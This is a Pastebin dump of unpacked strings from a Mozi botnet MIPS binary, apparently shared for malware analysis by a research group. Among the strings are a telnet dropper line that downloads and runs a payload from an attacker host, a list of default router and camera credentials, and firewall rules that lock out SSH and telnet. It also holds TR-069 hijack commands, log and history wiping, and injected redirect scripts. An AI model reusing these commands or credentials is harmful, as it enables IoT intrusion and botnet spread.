API tools faq
paste
Advertisement
MalwareMustDie

Unpacked strings of MOZI MIPS (little endian) ELF

MalwareMustDie
Oct 28th, 2019
5,168
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 32.70 KB | None | 0 0
raw download clone embed print report
  1.  
  2. 0x437c0 7 6 RANDOM
  3. 0x437c8 65 64 %s /%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n
  4. 0x43810 85 84 GET /cdn-cgi/l/chk_captcha HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n
  5. 0x43868 8 7 8.8.8.8
  6. 0x43870 16 15 /proc/net/route
  7. 0x43880 11 10 \t00000000\t
  8. 0x4388c 16 15 sfjsxkfl2dn6ani
  9. 0x438b8 5 4 HTTP
  10. 0x438c0 20 4 UST蜻・
  11. 0x438d4 60 59 lla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)
  12. 0x43910 65 64 Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
  13. 0x43954 67 66 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
  14. 0x43998 67 66 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
  15. 0x439dc 67 66 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
  16. 0x43a20 67 66 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
  17. 0x43a64 67 66 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
  18. 0x43aa8 110 109 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
  19. 0x43b18 115 114 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
  20. 0x43b8c 73 72 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
  21. 0x43bd8 135 134 Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
  22. 0x43c60 73 72 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
  23. 0x43cac 110 109 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
  24. 0x43d1c 109 108 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
  25. 0x43d8c 115 114 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
  26. 0x43e00 117 116 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
  27. 0x43e78 69 68 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  28. 0x43ec0 47 46 Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)
  29. 0x43ef0 63 62 Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
  30. 0x43f30 73 72 Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
  31. 0x43f7c 120 119 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
  32. 0x43ff4 111 110 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
  33. 0x44064 109 108 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
  34. 0x440d4 115 114 Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
  35. 0x44148 147 146 Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
  36. 0x441dc 70 69 Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
  37. 0x44224 70 69 Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30)
  38. 0x4426c 64 63 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
  39. 0x442ac 123 122 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
  40. 0x44328 103 102 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
  41. 0x44390 123 122 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
  42. 0x4440c 80 79 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
  43. 0x4445c 82 81 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
  44. 0x444b0 82 81 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
  45. 0x44504 82 81 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
  46. 0x44558 83 82 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
  47. 0x445b0 5 4 HEAD
  48. 0x445b8 5 4 POST
  49. 0x445c4 20 19 select: %s [%s:%d]\n
  50. 0x445d8 13 12 bot/config.c
  51. 0x445e8 17 16 connect time out
  52. 0x445fc 17 16 GET /c HTTP/1.0\n
  53. 0x44610 10 9 Host: %s\n
  54. 0x4461c 12 11 %d.%d.%d.%d
  55. 0x44628 20 19 %hhu.%hhu.%hhu.%hhu
  56. 0x4463c 9 8 ./config
  57. 0x4464c 12 11 /tmp/config
  58. 0x44658 12 11 /var/config
  59. 0x44664 50 49 8.8.8.8 pool.ntp.org ntp.ubuntu.com time.nist.gov
  60. 0x446a0 16 15 %lu.%lu.%lu.%lu
  61. 0x446b0 7 6 (null)
  62. 0x446b8 6 5 [sip]
  63. 0x446c0 7 6 [/sip]
  64. 0x446c8 5 4 7001
  65. 0x446d0 5 4 2121
  66. 0x446d8 5 4 8000
  67. 0x446e0 6 5 [atk]
  68. 0x446e8 7 6 [/atk]
  69. 0x446f0 8 7 loginok
  70. 0x446f8 9 8 Host: %s
  71. 0x44704 6 5 %s:%d
  72. 0x4470c 5 4 http
  73. 0x44714 8 7 Server:
  74. 0x4471c 15 14 Content-Length
  75. 0x4472c 6 5 HTTP/
  76. 0x44734 9 8 complete
  77. 0x44740 9 8 gpon8080
  78. 0x44750 7 6 gpon80
  79. 0x44758 8 7 realtek
  80. 0x44760 12 11 netgear8080
  81. 0x4476c 10 9 netgear80
  82. 0x44778 7 6 huawei
  83. 0x44780 6 5 tr064
  84. 0x44788 5 4 hnap
  85. 0x44790 12 11 camcrossweb
  86. 0x4479c 8 7 camjaws
  87. 0x447a4 6 5 dlink
  88. 0x447ac 6 5 r7064
  89. 0x447b4 7 6 vacron
  90. 0x447c8 47 46 iptables -D INPUT  -p tcp --dport %d -j ACCEPT
  91. 0x447f8 47 46 iptables -D OUTPUT -p tcp --sport %d -j ACCEPT
  92. 0x44828 59 58 iptables -D PREROUTING  -t nat -p tcp --dport %d -j ACCEPT
  93. 0x44864 59 58 iptables -D POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
  94. 0x448a0 19 18 /proc/self/cmdline
  95. 0x448b8 34 33 220 Anonymous FTP server ready.\r\n
  96. 0x448dc 22 21 Error read(): %s(%d)\n
  97. 0x448f4 14 13 User log out!
  98. 0x44904 5 4 USER
  99. 0x4490c 39 38 530 You have input username already!\r\n
  100. 0x44934 40 39 331 Username accepted. Need password.\r\n
  101. 0x4495c 37 36 530 You should use right username!\r\n
  102. 0x44984 5 4 PASS
  103. 0x4498c 31 30 530 You have log in already!\r\n
  104. 0x449ac 42 41 530 You have not input username before!\r\n
  105. 0x449d8 33 32 530 You should input password!\r\n
  106. 0x449fc 22 21 230 Access granted.\r\n
  107. 0x44a14 19 18 User '%s' log in!\n
  108. 0x44a28 5 4 RETR
  109. 0x44a30 28 27 425 Can not set a socket.\r\n
  110. 0x44a4c 43 42 150 Opening BINARY mode data connection.\r\n
  111. 0x44a78 42 41 425 PASV or PORT may not be set before.\r\n
  112. 0x44aa4 25 24 530 You should log in!\r\n
  113. 0x44ac0 35 34 550 You don't have enough right!\r\n
  114. 0x44ae4 22 21 550 Read file fail!\r\n
  115. 0x44afc 23 22 426 Send file error!\r\n
  116. 0x44b14 27 26 226 Transfer successful.\r\n
  117. 0x44b30 5 4 QUIT
  118. 0x44b38 16 15 221 Good bye.\r\n
  119. 0x44b48 5 4 ABOR
  120. 0x44b50 5 4 SYST
  121. 0x44b58 20 19 215 UNIX Type: L8\r\n
  122. 0x44b6c 5 4 TYPE
  123. 0x44b78 21 20 200 Type set to I.\r\n
  124. 0x44b90 28 27 501 Unexpected parameter.\r\n
  125. 0x44bac 5 4 PORT
  126. 0x44bb4 20 19 200 PORT accepted\r\n
  127. 0x44bc8 5 4 PASV
  128. 0x44bd0 45 44 425 Some error happen when bind or listen.\r\n
  129. 0x44c00 25 24 227 =%d,%d,%d,%d,%d,%d\r\n
  130. 0x44c1c 47 46 iptables -I INPUT  -p tcp --dport %d -j ACCEPT
  131. 0x44c4c 47 46 iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
  132. 0x44c7c 59 58 iptables -I PREROUTING  -t nat -p tcp --dport %d -j ACCEPT
  133. 0x44cb8 59 58 iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
  134. 0x44cf8 19 18 250 CWD success!\r\n
  135. 0x44d0c 5 4 LIST
  136. 0x44d14 20 19 226 LIST success!\r\n
  137. 0x44d28 35 34 500 This Command is not support!\r\n
  138. 0x44d50 14 13 /tmp/Moziusa/
  139. 0x44d90 12 11 mv -f %s %s
  140. 0x44da4 10 9 1:v4:JBls
  141. 0x44db0 5 4 %02X
  142. 0x44db8 17 16 %d%c%d%c%d%c%d%c
  143. 0x44dcc 19 18 /etc/rc.d/rc.local
  144. 0x44de0 14 13 /etc/rc.local
  145. 0x44df4 5 4 exit
  146. 0x44dfc 6 5 \n%s%s
  147. 0x44e04 10 9 &\nexit 0\n
  148. 0x44e14 10 9 &\nexit 1\n
  149. 0x44e20 6 5 %s/%s
  150. 0x44e28 6 5 /proc
  151. 0x44e30 5 4 /tmp
  152. 0x44e38 5 4 /var
  153. 0x44e40 5 4 /lib
  154. 0x44e48 5 4 /dev
  155. 0x44e50 5 4 /sys
  156. 0x44e58 98 97 cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"
  157. 0x44ebc 111 110 cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"
  158. 0x44f2c 48 47 iptables -I INPUT  -p tcp --dport 35000 -j DROP
  159. 0x44f5c 48 47 iptables -I INPUT  -p tcp --dport 50023 -j DROP
  160. 0x44f8c 48 47 iptables -I OUTPUT -p tcp --sport 50023 -j DROP
  161. 0x44fbc 48 47 iptables -I OUTPUT -p tcp --sport 35000 -j DROP
  162. 0x44fec 47 46 iptables -I INPUT  -p tcp --dport 7547 -j DROP
  163. 0x4501c 47 46 iptables -I OUTPUT -p tcp --sport 7547 -j DROP
  164. 0x4504c 20 19 /mnt/jffs2/Equip.sh
  165. 0x45060 9 8 %s%s%s%s
  166. 0x4506c 10 9 #!/bin/sh
  167. 0x45078 19 18 /mnt/jffs2/wifi.sh
  168. 0x4508c 30 29 /mnt/jffs2/WifiPerformance.sh
  169. 0x450ac 13 12 /proc/mounts
  170. 0x450bc 25 24 %255s %255s %255s %255s\n
  171. 0x450dc 6 5 /dev/
  172. 0x450e8 8 7 /bin/sh
  173. 0x450f0 10 9 /bin/bash
  174. 0x450fc 11 10 /etc/rc.d/
  175. 0x45108 12 11 /etc/rcS.d/
  176. 0x45114 11 10 %s%s%s%s%s
  177. 0x45124 23 22 /etc/init.d/S95baby.sh
  178. 0x4513c 48 47 iptables -I INPUT  -p tcp --dport 58000 -j DROP
  179. 0x4516c 48 47 iptables -I OUTPUT -p tcp --sport 58000 -j DROP
  180. 0x4519c 14 13 /usr/local/ct
  181. 0x451ac 33 32 rm /home/httpd/web_shell_cmd.gch
  182. 0x451d0 34 33 echo 3 > /usr/local/ct/ctadmincfg
  183. 0x451f4 23 22 /usr/local/ct/ctadmin0
  184. 0x4520c 43 42 sendcmd 1 DB set MgtServer 0 Tr069Enable 1
  185. 0x45238 47 46 sendcmd 1 DB set PdtMiddleWare 0 Tr069Enable 0
  186. 0x45268 50 49 sendcmd 1 DB set MgtServer 0 URL http://127.0.0.1
  187. 0x4529c 46 45 sendcmd 1 DB set MgtServer 0 UserName notitms
  188. 0x452cc 63 62 sendcmd 1 DB set MgtServer 0 ConnectionRequestUsername notitms
  189. 0x4530c 52 51 sendcmd 1 DB set MgtServer 0 PeriodicInformEnable 0
  190. 0x45340 18 17 sendcmd 1 DB save
  191. 0x45354 8 7 [count]
  192. 0x4535c 9 8 [/count]
  193. 0x45368 5 4 [hp]
  194. 0x45370 6 5 [/hp]
  195. 0x45378 13 12 /dev/urandom
  196. 0x45388 12 11 /dev/random
  197. 0x45394 5 4 %5hu
  198. 0x4539c 139 138 GET %s HTTP/1.1\r\nHost: %s\r\nConnection: Keep-Alive\r\nContent-Type: application/octet-stream\r\nReferer: http://baidu.com/%s/%s/%d/%s/%s%s)\r\n\r\n
  199. 0x45428 94 93 GET %s HTTP/1.1\r\nHost: %s\r\nConnection: Keep-Alive\r\nContent-Type: application/octet-stream\r\n\r\n
  200. 0x45488 9 8 HTTP/1.1
  201. 0x45494 16 15 Content-Length:
  202. 0x454a4 14 13 Content-Type:
  203. 0x454b4 11 10 no aliases
  204. 0x454c0 19 18 bot/headers/down.h
  205. 0x454d4 6 5 1:v4:
  206. 0x454e0 8 7 2:id20:
  207. 0x454e8 15 14 9:info_hash20:
  208. 0x454f8 6 5 porti
  209. 0x45500 12 11 6:target20:
  210. 0x4550c 8 7 5:token
  211. 0x45514 8 7 5:nodes
  212. 0x4551c 9 8 6:nodes6
  213. 0x45528 10 9 6:valuesl
  214. 0x45534 8 7 4:wantl
  215. 0x45544 7 6 1:y1:r
  216. 0x4554c 7 6 1:y1:e
  217. 0x45554 7 6 1:y1:q
  218. 0x4555c 10 9 1:q4:ping
  219. 0x45568 15 14 1:q9:find_node
  220. 0x45578 15 14 1:q9:get_peers
  221. 0x45588 20 19 1:q13:announce_peer
  222. 0x4559c 9 8 /overlay
  223. 0x455a8 31 30 mount -o remount,rw /overlay /
  224. 0x455c8 15 14 /overlay/upper
  225. 0x455d8 19 18 /overlay/upper/usr
  226. 0x455ec 19 18 /overlay/upper/etc
  227. 0x45600 24 23 /overlay/upper/etc/rc.d
  228. 0x45618 26 25 /overlay/upper/etc/init.d
  229. 0x45634 13 12 /overlay/usr
  230. 0x45644 13 12 /overlay/etc
  231. 0x45654 18 17 /overlay/etc/rc.d
  232. 0x45668 20 19 /overlay/etc/init.d
  233. 0x4567c 14 13 /usr/networks
  234. 0x4568c 17 16 /usr/networkstmp
  235. 0x456a4 7 6 config
  236. 0x456ac 8 7 %ld%s%s
  237. 0x456b4 11 10 %s\t%lX\t%lX
  238. 0x456c4 5 4 [ud]
  239. 0x456cc 6 5 [/ud]
  240. 0x456d4 15 14 confirmed.list
  241. 0x456e4 9 8 new.list
  242. 0x456f0 11 10 kill -9 %d
  243. 0x456fc 5 4 baby
  244. 0x45704 5 4 [dr]
  245. 0x4570c 6 5 [/dr]
  246. 0x45718 6 5 [ver]
  247. 0x45720 7 6 [/ver]
  248. 0x45728 13 12 d1:ad2:id20:
  249. 0x45738 17 16 e1:q4:ping1:t%d:
  250. 0x4574c 8 7 1:y1:qe
  251. 0x45758 5 4 [nd]
  252. 0x45760 6 5 [/nd]
  253. 0x45768 5 4 2:n4
  254. 0x45770 5 4 2:n6
  255. 0x45778 13 12 4:wantl%s%se
  256. 0x45788 22 21 e1:q9:find_node1:t%d:
  257. 0x457a4 13 12 d1:rd2:id20:
  258. 0x457b4 8 7 e1:t%d:
  259. 0x457bc 8 7 1:y1:re
  260. 0x457c4 7 6 [cpux]
  261. 0x457cc 8 7 [/cpux]
  262. 0x457d4 6 5 [cpu]
  263. 0x457dc 7 6 [/cpu]
  264. 0x457e4 6 5 [ssx]
  265. 0x457ec 7 6 [/ssx]
  266. 0x457f4 5 4 [ss]
  267. 0x457fc 6 5 [/ss]
  268. 0x45804 5 4 none
  269. 0x4580c 5 4 [sv]
  270. 0x45814 6 5 [/sv]
  271. 0x4581c 5 4 [rn]
  272. 0x45824 6 5 [/rn]
  273. 0x4582c 5 4 run:
  274. 0x45834 13 12 d1:eli%de%d:
  275. 0x45844 8 7 1:y1:ee
  276. 0x4584c 11 10 5:nodes%d:
  277. 0x45858 12 11 6:nodes6%d:
  278. 0x45864 14 13 /dev/watchdog
  279. 0x45874 19 18 /dev/misc/watchdog
  280. 0x45888 6 5 /temp
  281. 0x45890 47 46 iptables -I INPUT  -p udp --dport %d -j ACCEPT
  282. 0x458c0 47 46 iptables -I OUTPUT -p udp --sport %d -j ACCEPT
  283. 0x458f0 59 58 iptables -I PREROUTING  -t nat -p udp --dport %d -j ACCEPT
  284. 0x4592c 59 58 iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
  285. 0x45968 8 7 0.0.0.0
  286. 0x45970 6 5 [idp]
  287. 0x45978 35 34 This node doesn't accept announces
  288. 0x4599c 28 27 dht.transmissionbt.com:6881
  289. 0x459b8 27 26 router.bittorrent.com:6881
  290. 0x459d4 25 24 router.utorrent.com:6881
  291. 0x459f0 26 25 bttracker.debian.org:6881
  292. 0x45a0c 19 18 212.129.33.59:6881
  293. 0x45a20 20 19 82.221.103.244:6881
  294. 0x45a34 20 19 130.239.18.159:6881
  295. 0x45a48 18 17 87.98.162.88:6881
  296. 0x45a5c 7 6 /temp/
  297. 0x45a64 6 5 /var/
  298. 0x45a6c 10 9 /var/tmp/
  299. 0x45a78 10 9 /var/run/
  300. 0x45a84 6 5 /usr/
  301. 0x45a8c 6 5 /mnt/
  302. 0x45a94 7 6 /home/
  303. 0x45a9c 8 7 http://
  304. 0x45aa4 9 8 https://
  305. 0x45add 6 5 Oo~Mn
  306. 0x45aea 6 4 g5=ヒ・
  307. 0x45b38 14 13 Range: bytes=
  308. 0x45b48 13 12 User-Agent:
  309. 0x45b58 6 5 %d.%d
  310. 0x45b60 13 12 /proc/%s/exe
  311. 0x45b70 275 274 <html><head></head><body><script type="text/javascript">var myTime = setTimeout("Timeout()", 3000); function Timeout() { document.location.href = document.URL + (~document.URL.indexOf("?") ? "&" : "?") + (new Date().getTime());} </script><script type="text/javascript" src="
  312. 0x45c84 8 7 /gojs/?
  313. 0x45c8c 26 25 "></script></body></html>
  314. 0x45ca8 214 213 <html><head><title></title><body style="overflow-x:hidden;overflow-y:hidden;margin:0px;padding:0px"><iframe  width='100%' height='100%' name="main" frameborder='0' border="0" marginwidth="0" marginheight="0" src="
  315. 0x45d80 160 159 " ></iframe><iframe  width='0' height='0' name="hide1" frameborder='0' border="0" marginwidth="0" marginheight="0" scrolling="no" allowtransparency="yes" src="
  316. 0x45e20 6 5 /go/?
  317. 0x45e28 62 61 " style="display:none" scrolling="no"></iframe></body></html>
  318. 0x45e68 751 750 <html><body><script type="text/javascript">function d(a,n){var c=a.length,b=a[c-1];if(n&&n!='SE_SSID'){for(var i=c-2;i>=0;i--){b=a[i]+'.'+b;document.cookie=n+'=; domain='+b+'; expires=Mon,01-Jan-1973 00:00:01 GMT';}}}(function (){var a=document.cookie.split('; ');for(var i=0;i<a.length;i++){d(location.hostname.split('.'),a[i].split('=')[0])}})();(function(u){if(window.navigate&&typeof navigate=='function')navigate(u);var ua=navigator.userAgent;if(ua.match(/applewebkit/i)){var h = document.createElement('a');h.rel='noreferrer';h.href=u;document.body.appendChild(h);var evt=document.createEvent('MouseEvents');evt.initEvent('click', true,true);h.dispatchEvent(evt);}else{document.write('<meta http-equiv="Refresh" Content="0; Url='+u+'" >');}})('
  319. 0x46158 27 26 ');</script></body></html>
  320. 0x46174 27 26 " ></iframe></body></html>
  321. 0x46190 59 58 document.write('<script language="javascript" src="http://
  322. 0x461d0 14 13 veri=20190909
  323. 0x461e0 16 15 "><\\/script>');
  324. 0x461f0 30 29 ?veri=20190909"><\\/script>');
  325. 0x46210 26 25 ?veri=20190909"></script>
  326. 0x4622c 35 34 The URL has moved <a href="http://
  327. 0x46250 11 10 ">here</a>
  328. 0x4625c 31 30 ?src=2876103848"><\\/script>');
  329. 0x4627c 84 83 if(top.location==self.location){document.write('<script language="javascript" src="
  330. 0x462d0 32 31 ?src=2876103848"><\\/script>');}
  331. 0x462f0 33 32 HTTP/1.1 301 Moved Permanently\r\n
  332. 0x46314 18 17 Location: http://
  333. 0x46328 18 17 HTTP/1.1 200 OK\r\n
  334. 0x4633c 17 16 Content-Length:
  335. 0x46354 46 45 Content-Type: text/html; charset=iso-8859-1\r\n
  336. 0x46384 18 17 Server: BWS/1.1\r\n
  337. 0x46398 47 46 Last-Modified: Wed, 17 Jul 2000 03:53:05 GMT\r\n
  338. 0x463c8 43 42 Cache-Control: no-cache, must-revalidate\r\n
  339. 0x463f4 41 40 Expires: Sat, 26 Jul 2000 05:00:00 GMT\r\n
  340. 0x46420 20 19 Connection: close\r\n
  341. 0x46434 6 5 [set]
  342. 0x4643c 7 6 [/set]
  343. 0x46450 123 122 1(765$`j4p(dmn'b75e-gjk=-9c44`e-gjk(86>5%)zfhc<c,a57s)ali*~bne>4%)ziw?lt,a57s)ali*ah,iw?7$g`lj&6!g*aht,oe?7?:-656)370+0$mh
  344. 0x464cc 14 13 fopen error!\n
  345. 0x464dc 8 7 %*[^\n]\n
  346. 0x464e4 29 28 %19s%lx%lx%X%d%d%d%lx%d%d%d\n
  347. 0x46508 7 6 Host:
  348. 0x46510 12 11 %u.%u.%u.%u
  349. 0x4651c 10 9 Referer:
  350. 0x46540 114 113 HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Length: %d\r\nConnection: close\r\nContent-Type: application/zip\r\n\r\n loginok
  351. 0x465b4 105 104 HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Length: %d\r\nConnection: close\r\nContent-Type: application/zip\r\n\r\n
  352. 0x46620 45 44 iptables -I INPUT  -p tcp --dport 22 -j DROP
  353. 0x46650 45 44 iptables -I INPUT  -p tcp --dport 23 -j DROP
  354. 0x46680 47 46 iptables -I INPUT  -p tcp --dport 2323 -j DROP
  355. 0x466b0 45 44 iptables -I OUTPUT -p tcp --sport 22 -j DROP
  356. 0x466e0 45 44 iptables -I OUTPUT -p tcp --sport 23 -j DROP
  357. 0x46710 47 46 iptables -I OUTPUT -p tcp --sport 2323 -j DROP
  358. 0x46740 7 6 /tmpx/
  359. 0x46748 16 15 /proc/%d/status
  360. 0x46758 7 6 %*s %s
  361. 0x46760 14 13 /proc/net/raw
  362. 0x46770 14 13 /proc/net/tcp
  363. 0x46780 7 6 /proc/
  364. 0x4678c 14 13 killall -9 %s
  365. 0x4679c 34 33 echo 3 > /proc/sys/vm/drop_caches
  366. 0x467c0 5 4 /run
  367. 0x467c8 6 5 /baby
  368. 0x467d0 16 15 /usr/bin/python
  369. 0x467e0 5 4 sshd
  370. 0x467e8 9 8 dropbear
  371. 0x467f4 16 15 255.255.255.255
  372. 0x46804 12 11 255.255.0.0
  373. 0x46810 25 24 %08X%08X%08X%08X%08X%08X
  374. 0x46859 6 5 }\fUt]
  375. 0x46878 7 5 フ。\f$o,
  376. 0x4688b 5 4 vRQ>
  377. 0x468af 6 5 '8!\e.
  378. 0x468b9 8 7 \r8STs\ne
  379. 0x468c1 5 4 \njv.
  380. 0x468d6 6 4 Kツ」Ql
  381. 0x468f4 5 4 LwH'
  382. 0x46903 6 4 NOハ彈
  383. 0x46909 10 7 o.h薰春oc
  384. 0x4692c 21 20 rm -rf /var/log/wtmp
  385. 0x46944 23 22 rm -rf ~/.bash_history
  386. 0x4695c 22 21 history -c;history -w
  387. 0x46974 11 10 history -c
  388. 0x46980 20 19 rm -rf /bin/netstat
  389. 0x46994 11 10 history -w
  390. 0x469a0 17 16 pkill -9 busybox
  391. 0x469b4 14 13 pkill -9 perl
  392. 0x469c4 10 9 connected
  393. 0x469d0 7 6 nvalid
  394. 0x469d8 6 5 ailed
  395. 0x469e0 9 8 ncorrect
  396. 0x469ec 6 5 enied
  397. 0x469f4 5 4 rror
  398. 0x469fc 7 6 oodbye
  399. 0x46a08 8 7 busybox
  400. 0x46a14 6 5 shell
  401. 0x46a1c 7 6 dvrdvs
  402. 0x46a24 8 7 mdm9625
  403. 0x46a2c 9 8 9615-cdp
  404. 0x46a40 5 4 user
  405. 0x46a48 5 4 ogin
  406. 0x46a50 5 4 name
  407. 0x46a58 5 4 pass
  408. 0x46a60 377 376 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; rm -rf i; wget http://%s:%d/i; curl -O http://%s:%d/i; /bin/busybox wget http://%s:%d/i; /bin/busybox tftp %s %d -c get i; chmod 777 i; ./i; tftp %s %d -c get i; chmod 777 i; ./i; tftp -r i -g %s %d; chmod 777 i; ./i; ftpget -v -u anonymous -p anonymous %s -P %d i i; ./i; echo -e '\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x65\\x64'\r\n
  409. 0x46bdc 456 455 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; rm -rf i; wget http://%s:%d/bin.sh; curl -O http://%s:%d/bin.sh; /bin/busybox wget http://%s:%d/bin.sh; /bin/busybox tftp %s %d -c get bin.sh; chmod 777 bin.sh; sh bin.sh; tftp %s %d -c get bin.sh; chmod 777 bin.sh; sh bin.sh; tftp -r bin.sh -g %s %d; chmod 777 bin.sh; sh bin.sh; ftpget -v -u anonymous -p anonymous %s -P %d bin.sh bin.sh; sh bin.sh; echo -e '\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x65\\x64'\r\n
  410. 0x46da4 68 67 start\r\nenable\r\nconfig terminal\r\nsystem\r\nlinuxshell\r\nsu\r\nshell\r\nsh\r\n
  411. 0x46e10 5 4 root
  412. 0x46e18 6 5 admin
  413. 0x46e20 6 5 super
  414. 0x46e28 12 11 telnetadmin
  415. 0x46e38 9 8 !!Huawei
  416. 0x46e44 7 6 keomeo
  417. 0x46e4c 8 7 support
  418. 0x46e58 9 8 e8telnet
  419. 0x46e64 9 8 e8ehome1
  420. 0x46e70 8 7 e8ehome
  421. 0x46e7c 5 4 user
  422. 0x46e84 7 6 mother
  423. 0x46e8c 14 13 Administrator
  424. 0x46e9c 8 7 service
  425. 0x46ea8 11 10 supervisor
  426. 0x46eb4 6 5 guest
  427. 0x46ebc 7 6 admin1
  428. 0x46ec4 14 13 administrator
  429. 0x46ed4 7 6 666666
  430. 0x46edc 7 6 888888
  431. 0x46ee4 5 4 ubnt
  432. 0x46eec 5 4 tech
  433. 0x46ef4 7 6 xc3511
  434. 0x46efc 6 5 vizxv
  435. 0x46f04 5 4 gpon
  436. 0x46f0c 7 6 Zte521
  437. 0x46f14 6 5 hg2x0
  438. 0x46f1c 11 10 epicrouter
  439. 0x46f28 9 8 conexant
  440. 0x46f34 9 8 xJ4pCYeW
  441. 0x46f40 7 6 v2mprt
  442. 0x46f48 9 8 PhrQjGzk
  443. 0x46f54 9 8 h@32LuyD
  444. 0x46f60 9 8 gw1admin
  445. 0x46f6c 10 9 adminpass
  446. 0x46f78 8 7 xmhdipc
  447. 0x46f84 8 7 default
  448. 0x46f90 9 8 juantech
  449. 0x46f9c 11 10 @HuaweiHgw
  450. 0x46fa8 8 7 adminHW
  451. 0x46fb4 10 9 2010vesta
  452. 0x46fc0 10 9 2011vesta
  453. 0x46fcc 13 12 plumeria0077
  454. 0x46fdc 8 7 cat1029
  455. 0x46fe8 7 6 123456
  456. 0x46ff0 6 5 54321
  457. 0x46ffc 7 6 hi3518
  458. 0x47004 9 8 password
  459. 0x47010 6 5 12345
  460. 0x47018 7 6 fucker
  461. 0x47020 5 4 pass
  462. 0x47028 10 9 admin1234
  463. 0x47034 5 4 1111
  464. 0x4703c 9 8 smcadmin
  465. 0x47048 5 4 1234
  466. 0x47050 7 6 klv123
  467. 0x47058 8 7 klv1234
  468. 0x4706c 6 5 jvbzd
  469. 0x47074 5 4 anko
  470. 0x4707c 5 4 zlxx
  471. 0x47084 13 12 7ujMko0vizxv
  472. 0x47094 13 12 7ujMko0admin
  473. 0x470a4 7 6 system
  474. 0x470ac 5 4 ikwb
  475. 0x470b4 9 8 dreambox
  476. 0x470c0 8 7 realtek
  477. 0x470cc 9 8 00000000
  478. 0x470d8 8 7 1111111
  479. 0x470e4 7 6 meinsm
